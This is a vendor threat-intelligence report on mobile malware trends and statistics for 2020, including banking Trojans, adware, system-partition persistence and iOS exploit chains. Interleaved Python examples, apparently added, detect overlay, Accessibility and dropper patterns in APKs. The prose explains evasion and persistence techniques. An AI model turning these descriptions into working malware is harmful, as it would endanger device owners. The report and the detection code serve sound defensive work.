Kaspersky

1 March 2021

Mobile malware evolution 2020

These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data.

The year in figures

In 2020, Kaspersky mobile products and technologies detected:

  • 5,683,694 malicious installation packages,
  • 156,710 new mobile banking Trojans,
  • 20,708 new mobile ransomware Trojans.
Trends of the year

In their campaigns to infect mobile devices, cybercriminals always resort to social engineering tools, the most common of these passing a malicious application off as another, popular and desirable one. All they need to do is correctly identify the application, or at least, the type of applications, that are currently in demand. Therefore, attackers constantly monitor the situation in the world, collecting the most interesting topics for potential victims, and then use these for infection or cheating users out of their money. It just so happened that the year 2020 gave hackers a large number of powerful news topics, with the COVID-19 pandemic as the biggest of these.

Pandemic theme in mobile threats

The word “covid” in various combinations was typically used in the names of packages hiding spyware and banking Trojans, adware or Trojan droppers. Names we encountered included covid.apk, covidMapv8.1.7.apk, tousanticovid.apk, covidMappia_v1.0.3.apk and coviddetect.apk. These apps were placed on malicious websites, hyperlinks were distributed through spam, etc.

The mobile malware Trojan-Ransom.AndroidOS.Agent.aq often hid behind another popular term, “corona”. Here are a few names of malicious files: ir.corona.viruss.apk, coronalocker.zip, com.coronavirus.inf.apk, coronaalert.apk, corona.apk, corona-virusapps.com.zip, com.coronavirus.map.1.1.apk, coronavirus.china.

Of course, this was not limited to naming: the pandemic theme was also used in application user interfaces. For example, the Ginp banking Trojan pretended to be an app that searched for COVID-19-infected individuals: the victim was coaxed into providing their bank card details under the pretext of a €0.75 fee.

The creators of another banking Trojan, Cebruser, simply named it “Coronavirus”, probably to echo the disturbing news coming from all over the world and to make some money along the way. As in the previous case, the attackers were after the bank card details and the owner’s personal information.

They came up with nothing new in terms of technique. So-called web injects (overlay windows), perfected over many years, were used in both cases. When the banking Trojan detects a trigger event, typically the launch of a targeted financial app, it opens a window on top of it that displays a web page requesting bank card details. The page can have any design: in one case we have seen a form imitating a large bank, in another a message about a search for COVID-19-infected individuals. That flexibility lets attackers manipulate potential victims efficiently, adapting the attack both to what is on a particular device and to what is happening in the world at large.

We could conclude that the pandemic as a global phenomenon had a major effect on the mobile threat landscape, but to be true to facts, this is not entirely the case. If you look at the dynamics of attacks on mobile users in 2020, you will see that the average monthly number of attacks decreased by 865,000 compared to 2019. That number seems large, but it is only about 1.07% of total attacks, so we cannot call it a significant decrease.

Number of attacks on mobile users in 2019 and 2020

Besides, we have seen a decrease in attacks in the first half of 2020, which can be attributed to the confusion of the first months of the pandemic: hackers had other things to worry about. However, in the second half of the year, when the situation became calmer and more predictable despite lockdowns in a number of countries, we saw a clear increase in attacks.

In addition, our telemetry has shown significant growth in mobile financial threats in 2020. More on that later.

Adware

Last year was notable for both malware and adware, the two being very close in terms of capabilities. Typically, the code that runs ads was embedded in a carrier application, e.g. a mobile game or a torch app, as long as it was popular enough. Once the application ran, it could follow one of several scenarios, depending on its creator's greed and the advertising module's capabilities. If the user was lucky, they saw an advertising banner at the bottom of the carrier application's window; if not, the advertising module registered a receiver for USER_PRESENT (device unlock) broadcasts and used a SYSTEM_ALERT_WINDOW overlay to display full-screen banners at random intervals.


Ad window (left) and carrier app definition (right)

In the latter case, the problem was not just the size of the banner, but also difficulty identifying the application that it was coming from. There were usually no technical obstacles to removing this application, and with it, the ads. We had recorded apps featuring aggressive advertising appearing in Google Play before, but 2020 proved rich in this kind of cases.

In terms of the number of attacks on mobile users, the situation around various advertising modules and applications looked more or less stable. This is probably one of the few classes of threats where the number of attacks hardly changed in 2020 as compared to the previous year.

Number of adware attacks on mobile users in 2019 and 2020

The number of unique users attacked by adware decreased slightly compared to 2019.

Users attacked by adware in 2018 through 2020

Interestingly enough, the share of adware attacks increased in relation to mobile malware in general. Whereas it was 12.85% in 2019, it reached 14.62% in 2020.

Distribution of attacks by type of software used in 2020

Adware creators are interested in obstructing the removal of their products from a mobile device. They typically work with malware developers to achieve this. An example of a partnership like that is the use of various trojan botnets: we saw a number of these cases in 2020.

The pattern is quite simple. The bot infects a mobile device and waits for a command, usually trying to avoid the victim’s attention. As soon as the owners of the botnet and their customers come to an agreement, the bot receives a command to download, install and run a payload, in this case, adware. If the victim is annoyed by the unsolicited advertising and removes the source, the bot will simply repeat the steps. In addition, trojans have been known to elevate access privileges on the device, placing adware in the system area and making the user unable to remove them without outside help.

Another example of the partnership is so-called preinstall. The device manufacturer preloads an adware application or component with the firmware, so the device hits the shelves already infected. This is not a supply chain attack in the usual sense but a premeditated step on the part of the manufacturer, for which it receives extra profit. To make matters worse, a security solution installed by the user runs as an ordinary app: it can read the system partition and detect the threat there, but it cannot modify that partition, because Android mounts it read-only. Even when detection succeeds, the user is left alone with the threat, without a quick or easy way of removing it. This vector for spreading persistent threats is likely to become increasingly popular in the absence of new effective exploits for popular Android versions.

Attacks on personal data

Almost any of the personal data stored on our smartphones can be monetized. In particular, advertisers can display targeted offerings, and attackers can access accounts with various services, such as online banking. It is thus small wonder that data is hunted: sometimes openly and sometimes illegally.

Ever since Android introduced Accessibility Services, which let an app read the contents of other apps' screens, change settings and act on the user's behalf, the number of malware tools that extract confidential data from mobile devices has been on the rise. The Trojan Ghimob was one of 2020's most notable discoveries. It stole credentials for various financial systems, including online banking applications and cryptocurrency wallets, in Brazil. Ghimob used Accessibility both for extracting valuable data from application windows and for interacting with the operating system. Whenever the user tried to reach the menu from which Ghimob could be removed, the Trojan immediately opened the home screen to protect itself from being uninstalled.
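A static triage check for the two mechanisms described above, the USER_PRESENT receiver plus SYSTEM_ALERT_WINDOW combination that full-screen adware uses (see the Adware section) and the Accessibility Service that Ghimob abuses, with the Device Admin receiver that some families use to resist removal thrown in. This is an added example, not Kaspersky's code or any malware family's. It assumes the APK's binary AndroidManifest.xml has already been decoded to plain XML (apktool does this); the two manifests below are constructed for the demonstration and their package and component names are made up.

```python
"""Flag manifest permission/component combinations typical of aggressive adware
and Accessibility-abusing bankers. Input is a decoded (plain-XML) manifest."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
A_NAME = f"{{{ANDROID_NS}}}name"              # ElementTree key for android:name
A_PERMISSION = f"{{{ANDROID_NS}}}permission"  # ElementTree key for android:permission

OVERLAY_PERM = "android.permission.SYSTEM_ALERT_WINDOW"
UNLOCK_ACTION = "android.intent.action.USER_PRESENT"
ACCESSIBILITY_PERM = "android.permission.BIND_ACCESSIBILITY_SERVICE"
DEVICE_ADMIN_PERM = "android.permission.BIND_DEVICE_ADMIN"
LAUNCHER_CATEGORY = "android.intent.category.LAUNCHER"


def triage_manifest(manifest_xml: str) -> dict:
    """Return {'package': ..., 'findings': {finding: detail}} for one manifest."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package", "<unknown>")
    requested = {p.get(A_NAME) for p in root.iter("uses-permission")}
    app = root.find("application")
    findings = {}
    if app is None:
        return {"package": package, "findings": findings}

    # Adware pattern: a receiver for the device-unlock broadcast combined with
    # the overlay permission lets the app draw full-screen banners on unlock.
    unlock_receivers = [
        r.get(A_NAME) for r in app.iter("receiver")
        if any(a.get(A_NAME) == UNLOCK_ACTION for a in r.iter("action"))
    ]
    if unlock_receivers and OVERLAY_PERM in requested:
        findings["overlay_on_unlock"] = unlock_receivers

    # Banker pattern: a service bound with the Accessibility permission can read
    # other apps' screens and inject actions (the Ghimob technique).
    accessibility_services = [
        s.get(A_NAME) for s in app.iter("service")
        if s.get(A_PERMISSION) == ACCESSIBILITY_PERM
    ]
    if accessibility_services:
        findings["accessibility_service"] = accessibility_services

    # Device Admin receiver: commonly used to make uninstalling harder.
    admin_receivers = [
        r.get(A_NAME) for r in app.iter("receiver")
        if r.get(A_PERMISSION) == DEVICE_ADMIN_PERM
    ]
    if admin_receivers:
        findings["device_admin"] = admin_receivers

    # No launcher entry at all: nothing for the user to tap, so hard to notice.
    if not any(c.get(A_NAME) == LAUNCHER_CATEGORY for c in app.iter("category")):
        findings["no_launcher_icon"] = True

    return {"package": package, "findings": findings}


# Constructed sample manifests (names invented for the demo).
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.torch">
  <uses-permission android:name="android.permission.CAMERA"/>
  <application android:label="Torch">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
  </application>
</manifest>"""

SUSPICIOUS_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.torch.free">
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <application android:label="Torch">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <receiver android:name=".UnlockReceiver">
      <intent-filter><action android:name="android.intent.action.USER_PRESENT"/></intent-filter>
    </receiver>
    <service android:name=".HelperService"
        android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
      <intent-filter><action android:name="android.accessibilityservice.AccessibilityService"/></intent-filter>
    </service>
  </application>
</manifest>"""

if __name__ == "__main__":
    for m in (BENIGN_MANIFEST, SUSPICIOUS_MANIFEST):
        print(triage_manifest(m))
```

None of these findings is proof of malice on its own (screen readers legitimately bind an Accessibility Service, and an MDM client legitimately holds Device Admin), which is why the function reports the combination and the component names rather than a verdict; it is a prioritisation filter for a pile of APKs, not a detector.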

Another notable discovery was the Cookiethief Trojan. As the name implies, the malware targeted cookies, which store unique web session identifiers and can therefore be used for authentication. For example, an attacker could log in to a victim's Facebook account and post a phishing link or spread spam. On a mobile device, cookies are normally stored in the browser's private data directory, which the Android application sandbox makes inaccessible to other apps, even malicious ones. To circumvent that restriction, Cookiethief attempted to obtain root privileges on the device with the help of an exploit before beginning its malicious activity.

Apple iOS

According to various sources, the proportion of Android-powered devices among all mobile devices ranges from 50% to 85% depending on the region. Apple's iOS naturally comes second. So, what were the threats to that system in 2020? According to the price list published by the exploit broker Zerodium, the price of an iOS exploit chain is quite impressive, albeit lower than that for Android: $2,000,000 against $2,500,000. We are not aware of Zerodium's pricing mechanics, but the figures suggest that attacks on Apple devices are a much sought-after commodity. In practice, infecting a current iOS device requires exactly such a chain, delivered as a drive-by download.

In 2020, our colleagues at Trend Micro detected the use of Apple WebKit exploits for remote code execution (RCE) in conjunction with local privilege escalation exploits to deliver malware to an iOS device. The payload was the LightSpy Trojan, whose objective was to extract personal information from the device, including correspondence from instant messaging apps and browser data, take screenshots, and compile a list of nearby Wi-Fi networks. The Trojan was modular, with its individual components receiving updates. One of the modules discovered was a network scanner that collected information about nearby devices, including their MAC addresses and manufacturer names. Trend Micro reported that LightSpy was distributed through news portals, such as COVID-19 update sites.

Statistics

Number of installation packages

We discovered 5,683,694 mobile malicious installation packages in 2020, which was 2,100,000 more than in 2019.

Mobile malicious installation packages for Android in 2017 through 2020

The year 2020 can be said to have broken an established downward trend in the number of mobile threats discovered. There were not any special factors driving that, though.

Number of mobile users attacked

Mobile users attacked in 2019 and 2020

The number of users attacked steadily decreased over the past year. The number of users encountering mobile threats in 2020 was on the average a quarter lower than that in 2019.

Geography of mobile threats in 2020

Top 10 countries by share of users attacked by mobile malware

 #  Country*          %**
 1  Iran            67.78
 2  Algeria         31.29
 3  Bangladesh      26.18
 4  Morocco         22.67
 5  Nigeria         22.00
 6  Saudi Arabia    21.75
 7  India           20.69
 8  Malaysia        19.68
 9  Kenya           18.52
10  Indonesia       17.88

* Excluded from the rankings are countries with fewer than 25,000 active users of Kaspersky mobile security solutions in the reporting period.
** Users attacked in the country as a percentage of all users of Kaspersky Security for Mobile in the country.

Iran (67.78%) led by share of attacked users, mainly due to an aggressive spread of the AdWare.AndroidOS.Notifyer family. An alternative Telegram client, which we detect as RiskTool.AndroidOS.FakGram.d, was another widespread threat. This is not malware per se, but messages sent through the app can end up with unintended recipients. A frequently detected malicious program was Trojan.AndroidOS.Hiddapp.bn, whose objective was to download adware to the infected device.

Algeria ranked second with 31.29%. The AdWare.AndroidOS.FakeAdBlocker and AdWare.AndroidOS.HiddenAd families were the most widespread ones in that country. Two of the most widespread malicious programs were Trojan-Dropper.AndroidOS.Agent.ok and Trojan.AndroidOS.Agent.sr.

Rounding out the “top three” was Bangladesh with 26.18%, where the FakeAdBlocker and HiddenAd adware families were also the most widespread ones.

Types of mobile threats

Distribution of new mobile threats by type in 2019 and 2020

Twelve of the twenty-two types of mobile threats showed an increase in the number of detected installation packages in 2020, with the most significant growth shown by adware: from 21.81% to 57.26%. In absolute terms, the number of packages more than quadrupled: 3,254,387 in 2020 against 764,265 in 2019. Unsurprisingly, the share of the former leader, RiskTool, dropped from 32.46% to 21.34%. Third place, as in 2019, was occupied by Trojan-Dropper malware (4.51%), whose share also decreased markedly, by 11.58 p.p.

Adware

The vast majority (almost 65%) of adware discovered in 2020 belonged to the Ewind family. The most common member of that family was AdWare.AndroidOS.Ewind.kp, with more than 2,100,000 installation packages.

Top 10 adware families discovered in 2020

Name of family      %*
Ewind            64.93
FakeAdBlocker    15.27
HiddenAd         10.09
Inoco             2.16
Agent             1.12
Dnotua            0.84
MobiDash          0.69
SplashAd          0.66
Vuad              0.64
Dowgin            0.47

* Share of the adware family in the total number of adware packages

The Ewind family is an example of aggressive adware. Its members try to monitor the user’s activities and counteract attempts at removal. In particular, the aforementioned Ewind.kp variant displays an error message upon starting.


AdWare.AndroidOS.Ewind.kp screenshot

As soon as the user taps OK, the app window will close and its icon will be hidden from the home screen. After that, the Ewind.kp will monitor the user’s activity and display advertising windows at certain points. In addition to banners in the notification bar, the app will open promoted sites, such as online casinos, in a separate browser window.


Advertising banner (left) and open Ewind.kp browser window with a promoted website (right)

Where did the more than two million Ewind.kp packages come from? Its creators reuse the content of legitimate applications, such as icons and resource files. The resulting packages seldom do anything useful, but Ewind applications assembled from others' content could fill an entire fake app marketplace. They all have different names, icons and installation package sizes, so an unsophisticated user might not suspect anything amiss about the store.

The best part of it is that the AdWare.AndroidOS.Ewind.kp variant has been known since 2018, and we have never once had to adjust the process of detecting it in almost three years. Individuals who generate that many installation packages are obviously not worried about antivirus software.

RiskTool

RiskTool-class applications remained one of the three most relevant threats even without showing a significant growth in 2020. Their share declined in relation to others, but in absolute terms, the threats in that class even gained relevance. The major contributing factor was the SMSReg family, which doubled in number to 424,776 applications compared to 2019.

Top 10 RiskTool families discovered in 2020

Name of family      %*
SMSreg           41.75
Robtes           16.13
Agent             9.67
Dnotua            7.72
Resharer          7.50
Skymobi           5.29
Wapron            3.42
SmsPay            2.78
PornVideo         1.41
Paccy             0.76

* Share of the RiskTool family in the total number of RiskTool packages

Other threats

The number of backdoors detected almost tripled from 28,889 in 2019 to 84,495 in 2020. However, most of the detected threats notably belonged to older families whose relevance was questionable. Where did these come from? Many members of these families became publicly available, serving as test subjects: for instance, their code was obfuscated to test the antivirus engine’s detection quality. This does not make a whole lot of sense, as obfuscation is only effective against engines with very limited capabilities. More importantly, however, the legality of these activities is doubtful: lab tests on malware code are acceptable, but publication of samples is ethically questionable at the very least.

The number of detected Android exploits increased seventeenfold. LPE exploits, relevant to Android versions 4 through 7, accounted for most of the growth. As for exploits for more recent versions of that OS, they are typically device specific.

The number of Trojan-Proxy threats increased twelvefold. This type of malware turns the infected device into a proxy: it establishes an encrypted tunnel to the attackers' infrastructure, which they can then use as they see fit. A major risk for the victim is that their device is used as an intermediary in criminal activity, e.g. downloading child sexual abuse material, which may lead to law enforcement taking an interest in the owner of the infected device and asking questions they would rather avoid. For companies, a tunnel between an infected corporate smartphone and an unknown attacker means unauthorized third-party access to internal infrastructure, which, to put it mildly, is undesirable.

Top 20 mobile malware programs

The following malware rankings omit riskware, such as RiskTool and AdWare.

 #  Verdict                                   %*
 1  DangerousObject.Multi.Generic          36.95
 2  Trojan.AndroidOS.Boogr.gsh              9.54
 3  DangerousObject.AndroidOS.GenericML     6.63
 4  Trojan-Downloader.AndroidOS.Necro.d     4.08
 5  Trojan-Dropper.AndroidOS.Hqwar.cf       4.02
 6  Trojan-SMS.AndroidOS.Agent.ado          4.02
 7  Trojan.AndroidOS.Hiddad.fi              2.64
 8  Trojan.AndroidOS.Agent.vz               2.60
 9  Trojan-Downloader.AndroidOS.Helper.a    2.51
10  Trojan.AndroidOS.Handda.san             1.96
11  Trojan-Downloader.AndroidOS.Agent.ic    1.80
12  Trojan-Downloader.AndroidOS.Agent.hy    1.67
13  Trojan.AndroidOS.MobOk.v                1.60
14  Trojan.AndroidOS.LockScreen.ar          1.49
15  Trojan.AndroidOS.Piom.agcb              1.49
16  Trojan.AndroidOS.Hiddapp.ch             1.46
17  Exploit.AndroidOS.Lotoor.be             1.39
18  Trojan-Dropper.AndroidOS.Hqwar.gen      1.34
19  Trojan.AndroidOS.Necro.a                1.29
20  Trojan-Dropper.AndroidOS.Agent.rb       1.26

* Share of users attacked by this type of malware in total attacked users

The leaders among the twenty most widespread malicious mobile applications were unchanged from 2019, with only their shares changing slightly. The leader was DangerousObject.Multi.Generic (36.95%), the verdict we use for malware detected by using cloud technology. The verdict is applied where the antivirus databases still lack the signatures or heuristics for detection. The most recent malware is detected that way.

The Trojan.AndroidOS.Boogr.gsh verdict ranked second with 9.54%. It is assigned to files recognized as malicious by our ML-powered system. Another result of this system’s work is objects with the verdict DangerousObject.AndroidOS.GenericML (6.63%, ranking third). The verdict is assigned to files whose structure bears a strong similarity to previously known ones.

Trojan-Downloader.AndroidOS.Necro.d (4.08%) ranked fourth. Unlike other malicious programs in that family, which are installation packages, the Necro.d variant is a native ELF executable. We typically detected that Trojan in the read-only system area. It could only get there either via another Trojan that had obtained system privileges or as part of the firmware. Necro.d apparently relies on the former, as one of its capabilities is fetching KingRoot, a package used for privilege escalation. Necro.d's mission is to download, install and run other apps when instructed by the attackers. In addition, it provides remote access to a shell on the infected device.

The Hqwar dropper occupied fifth and eighteenth places at the same time (two verdicts). This malicious "phoenix" seems to be rising from the ashes: 39,000 users were attacked in 2020 compared to 28,000 in 2019. Hqwar in a nutshell:

  • This is a nesting-doll malicious program that has an external dropper shell next to an obfuscated DEX executable payload.
  • Its main objective is evading detection by the antivirus engine if the device has a security solution installed.
  • Banking Trojans typically serve as the payload.

Number of users attacked by Hqwar droppers in 2019 and 2020

In most cases, the banking Trojans dropped by Hqwar were focused on targets in Russia, specifically on applications operated by Russian financial institutions.

Top 10 countries by number of users attacked by Hqwar

 #  Country          Attacked users
 1  Russia                   305861
 2  Turkey                    22138
 3  Spain                     15160
 4  Italy                      8314
 5  Germany                    3659
 6  Poland                     3072
 7  Egypt                      2938
 8  Australia                  2465
 9  Great Britain              1446
10  USA                        1351

Trojan-SMS.AndroidOS.Agent.ado (4.02%) ranked sixth in the Top 20 mobile malicious programs. This is a typical example of the old-school premium-rate text message scam that was popular in 2011 and 2012; its enduring relevance is a surprise. The Trojan targets Russian-speaking users, Russia being a country with a mature market for buying content by sending text messages to premium-rate numbers. The design is modern, though: the Trojan uses an obfuscator as protection against reverse engineering and detection, and receives commands from external operators. Agent.ado is distributed under the guise of an app installer.

Trojan.AndroidOS.Hiddad.fi (2.64%) ranked seventh. This Trojan handles installation of adware in an infected system, but it can display ads as well.

Trojan.AndroidOS.Agent.vz (2.60%) ranked eighth. It is a malicious module loaded by other Trojans, including members of the Necro family. It serves as an intermediate link in the infection chain and is responsible for downloading further modules, for instance the Ewind adware mentioned above.

Trojan-Downloader.AndroidOS.Helper.a (2.51%) ranked ninth. It exemplifies how difficult removing mobile malware from a system can sometimes be. Helper is part of a chain that includes Trojans which elevate their privileges on the device and write themselves or Helper to the system area. In addition, the Trojans tamper with the factory reset process, leaving the user little chance of getting rid of the malware without outside help. The approach is nothing new, but in 2020 we saw plenty of users complaining online about the difficulty they were having removing Helper, something we had not seen before.
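One way to get hard evidence of the system-area persistence described for Necro.d and Helper, and of a preinstalled payload on a brand-new device (see the Adware section): hash every file in a copy of the system partition, compare it against a baseline taken from the vendor's firmware image for the same build, and separately flag any ELF binary that sits where only apps and data belong. This is an added example, not Kaspersky's code. It assumes you have both trees on a workstation (for instance copied with adb pull from a clean reference device and from the suspect one); the trees below are constructed in a temporary directory for the demonstration and their file names are made up.

```python
"""Baseline comparison of an Android system partition plus a misplaced-ELF check."""
import hashlib
import tempfile
from pathlib import Path

ELF_MAGIC = b"\x7fELF"
# Directories under /system where native executables and libraries belong.
# An ELF anywhere else (an app directory, etc/, media/ ...) deserves a look.
ELF_ALLOWED_PREFIXES = tuple(
    d + "/" for d in ("bin", "xbin", "lib", "lib64", "vendor/bin", "vendor/lib", "vendor/lib64")
)


def hash_tree(root: Path) -> dict:
    """Map relative POSIX path -> SHA-256 for every regular file below root."""
    result = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and not path.is_symlink():
            rel = path.relative_to(root).as_posix()
            result[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return result


def diff_trees(baseline: dict, suspect: dict) -> dict:
    """Files added to, removed from, or changed relative to the baseline."""
    common = set(baseline) & set(suspect)
    return {
        "added": sorted(set(suspect) - set(baseline)),
        "removed": sorted(set(baseline) - set(suspect)),
        "modified": sorted(p for p in common if baseline[p] != suspect[p]),
    }


def misplaced_elf(root: Path) -> list:
    """ELF files outside the directories where native code is expected."""
    hits = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.is_symlink():
            continue
        rel = path.relative_to(root).as_posix()
        if rel.startswith(ELF_ALLOWED_PREFIXES):
            continue
        with path.open("rb") as fh:
            if fh.read(4) == ELF_MAGIC:
                hits.append(rel)
    return hits


def _write(root: Path, rel: str, data: bytes) -> None:
    target = root / rel
    target.parent.mkdir(parents=True, exist_ok=True)
    target.write_bytes(data)


def build_demo() -> dict:
    """Constructed clean and suspect trees (file names and contents invented)."""
    with tempfile.TemporaryDirectory() as tmp:
        clean = Path(tmp) / "clean_system"
        suspect = Path(tmp) / "suspect_system"
        for root in (clean, suspect):
            _write(root, "bin/sh", ELF_MAGIC + b"\x02\x01\x01" + b"shell")
            _write(root, "app/Calculator/Calculator.apk", b"PK\x03\x04calc")
            _write(root, "build.prop", b"ro.build.version.release=10\n")
        # Suspect tree: a native ELF dropped into an app directory and a patched
        # system binary, the persistence pattern described in the report.
        _write(suspect, "app/.cache/daemon", ELF_MAGIC + b"\x02\x01\x01" + b"payload")
        _write(suspect, "bin/sh", ELF_MAGIC + b"\x02\x01\x01" + b"shell-patched")
        return {
            "diff": diff_trees(hash_tree(clean), hash_tree(suspect)),
            "misplaced_elf": misplaced_elf(suspect),
        }


if __name__ == "__main__":
    print(build_demo())
```

The comparison is only meaningful when the baseline comes from the same firmware build, so check build.prop (ro.build.fingerprint) on both sides first; a vendor OTA changes hundreds of files and would drown the one added daemon. Read-only does not mean untouched: as the report notes, a rooted Trojan or the manufacturer itself can write to the partition before it is mounted, which is exactly what the diff surfaces.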

Trojan.AndroidOS.Handda.san (1.96%) rounds out the first ten. This verdict is an umbrella for a whole group of malicious programs: Trojans with shared capabilities, such as icon hiding, obtaining Device Admin rights and using packers to counteract detection.

Trojans in the Trojan-Downloader.AndroidOS.Agent family ranked eleventh and twelfth, their only objective being downloading a payload when instructed by the operators. In both cases, the payload is encrypted and traffic cannot be interpreted to indicate what exactly is being loaded onto the device.

Trojan.AndroidOS.MobOk.v (1.60%) ranked thirteenth. MobOk Trojans can automatically subscribe the victim to paid services. In 2020 they attacked users in Russia more often than anywhere else.

The primitive Trojan.AndroidOS.LockScreen.ar (1.49%) ranked fourteenth. This malware was first spotted in 2017. Locking the device screen is its only mission.

Trojan.AndroidOS.Hiddapp.ch (1.46%) ranked sixteenth. We assign this verdict to any app that hides its icon from the app list immediately upon starting. Subsequent steps vary, but are typically downloading or dropping other apps, or displaying ads.

Exploit.AndroidOS.Lotoor.be (1.39%), a local exploit for elevating privileges to root, ranked seventeenth. Its popularity is no surprise: a root exploit is the step that lets Necro, Helper and other Trojans in our Top 20 install themselves into the system area.

Trojan.AndroidOS.Necro.a (1.29%), which ranked nineteenth, is the start of a chain of Trojans. It takes root in the system and, together with its associated Trojans, often proves difficult to remove.

Rounding out our Top 20 is Trojan-Dropper.AndroidOS.Agent.rb (1.26%). It serves various groups, and the objects it is used to pack include both malware and perfectly legitimate software. There are two notable variants: in the first, the code that decrypts the payload lives in a native library loaded from the main DEX file; in the second, the dropper code is contained entirely within the main DEX file.
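A triage pass for the dropper layouts described above, Hqwar's outer shell around an obfuscated DEX payload and the two Agent.rb variants (decryptor in a native library or in the main DEX): open the APK as a ZIP, flag any DEX or ELF that sits outside the places the build tools put them, flag high-entropy blobs in assets that are likely an encrypted second stage, and list native libraries so the two Agent.rb layouts can be told apart. This is an added example, not Kaspersky's code. The APK below is constructed in memory with made-up entry names, and the 7.5 bits/byte entropy threshold is a working assumption, not a figure from the report.

```python
"""Find nested DEX/ELF payloads and encrypted blobs inside an APK."""
import hashlib
import io
import math
import zipfile

DEX_MAGIC = b"dex\n"     # followed by the version, e.g. b"035\x00"
ELF_MAGIC = b"\x7fELF"
# Already-compressed formats sit near 8 bits/byte legitimately; skip them.
MEDIA_SUFFIXES = (".png", ".jpg", ".jpeg", ".webp", ".gif", ".ogg", ".mp3", ".mp4", ".ttf", ".arsc")
ENTROPY_THRESHOLD = 7.5  # bits per byte; assumption for this demo
MIN_BLOB_SIZE = 1024     # ignore tiny files, their entropy estimate is noisy


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte (0.0 for empty input, 8.0 for uniform bytes)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def scan_apk(apk_bytes: bytes) -> dict:
    """Return {'findings': [(entry, reason)], 'native_libs': [entry]}."""
    findings, native_libs = [], []
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as apk:
        for info in apk.infolist():
            if info.is_dir():
                continue
            name = info.filename
            data = apk.read(name)
            in_root = "/" not in name
            if in_root and name.endswith(".dex") and data.startswith(DEX_MAGIC):
                continue  # classes.dex, classes2.dex ... are where code belongs
            if name.startswith("lib/") and data.startswith(ELF_MAGIC):
                native_libs.append(name)  # expected place for native code
            elif data.startswith(DEX_MAGIC):
                findings.append((name, "DEX outside APK root (nested payload)"))
            elif data.startswith(ELF_MAGIC):
                findings.append((name, "ELF outside lib/"))
            elif (len(data) >= MIN_BLOB_SIZE
                  and not name.lower().endswith(MEDIA_SUFFIXES)):
                ent = shannon_entropy(data)
                if ent >= ENTROPY_THRESHOLD:
                    findings.append((name, f"high-entropy blob ({ent:.2f} bits/byte)"))
    return {"findings": findings, "native_libs": native_libs}


def _pseudo_random(n: int) -> bytes:
    """Deterministic high-entropy bytes (SHA-256 chain) standing in for ciphertext."""
    out, block = b"", b"seed"
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:n]


def build_demo_apk(with_payload: bool) -> bytes:
    """Constructed APK-like ZIP; entry names and contents are invented."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AndroidManifest.xml", b"\x03\x00\x08\x00" + b"\x00" * 64)  # AXML placeholder
        z.writestr("classes.dex", DEX_MAGIC + b"035\x00" + b"\x00" * 128)
        z.writestr("res/drawable/icon.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 200)
        if with_payload:
            # Agent.rb "native decryptor" layout: a library next to an encrypted asset.
            z.writestr("lib/arm64-v8a/libcore.so", ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 64)
            z.writestr("assets/config.bin", _pseudo_random(4096))
            # Hqwar-style nested DEX hidden under a misleading name.
            z.writestr("assets/fonts/data.ttc", DEX_MAGIC + b"035\x00" + b"\x00" * 128)
    return buf.getvalue()


if __name__ == "__main__":
    for flag in (False, True):
        print(scan_apk(build_demo_apk(flag)))
```

Read the two lists together: a high-entropy asset with a native library present points at the first Agent.rb layout (decryptor in the .so), the same asset without any native code at the second (decryptor in the DEX), and a plain nested DEX is the simplest shell-around-payload case. Legitimate apps also ship encrypted assets (licensing data, game content), so treat a hit as a reason to unpack the payload, not as a verdict.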

Mobile banking trojans

We detected 156,710 installation packages for mobile banking Trojans in 2020, which is twice the previous year’s figure and comparable to 2018.

Mobile banking Trojan installation packages detected by Kaspersky in 2017 through 2020

Whereas the 2018 statistics were heavily skewed by the Asacub epidemic, the main contributor last year was the Trojan-Banker.AndroidOS.Agent family. That family's share was just 19.06% in 2019 and jumped to 72.79% in 2020.

Top 10 banking trojans discovered in 2020

Name of family      %*
Agent            72.79
Wroba             5.44
Rotexy            5.18
Anubis            2.88
Faketoken         2.48
Zitmo             2.16
Knobot            1.53
Gustuff           1.48
Cebruser          1.43
Asacub            1.07

* Share of the mobile banker trojan family in the total number of mobile banker trojan packages

Agent.eq was the most prolific of all Agent (72.79%) variants. The heuristics turned out to be universal, helping us detect malware belonging to Asacub, Wroba and other families.

The Korean malware Wroba, spread by its operators through smishing, in particular, by sending fake text messages from a logistics company, ranked second. Like many others of its kind, the malware shows the victim one of a number of preset phishing windows, depending on what financial app is running on the home screen.

The rest of the programs in the rankings have been well known to researchers for a long time. One exception is Knobot (1.53%), a relatively new player that targets financial data. Along with phishing windows and interception of 2FA verification messages, the Trojan is equipped with several tools that are uncharacteristic of financial threats. One of these is capturing the device PIN by abusing Accessibility Services; the attackers would need the PIN to control the device manually in real time.

Attacks by mobile banking Trojans in 2019 and 2020

The surge in attacks in August 2020 is attributed to the Asacub, Agent and Rotexy families. It is through their escalating spread that the stable picture observed up until July was changed.

Top 10 families of mobile bankers

Family              %*
Asacub           25.63
Agent            17.97
Rotexy           17.92
Svpeng           12.81
Anubis           12.36
Faketoken        10.97
Hqwar             5.59
Cebruser          2.52
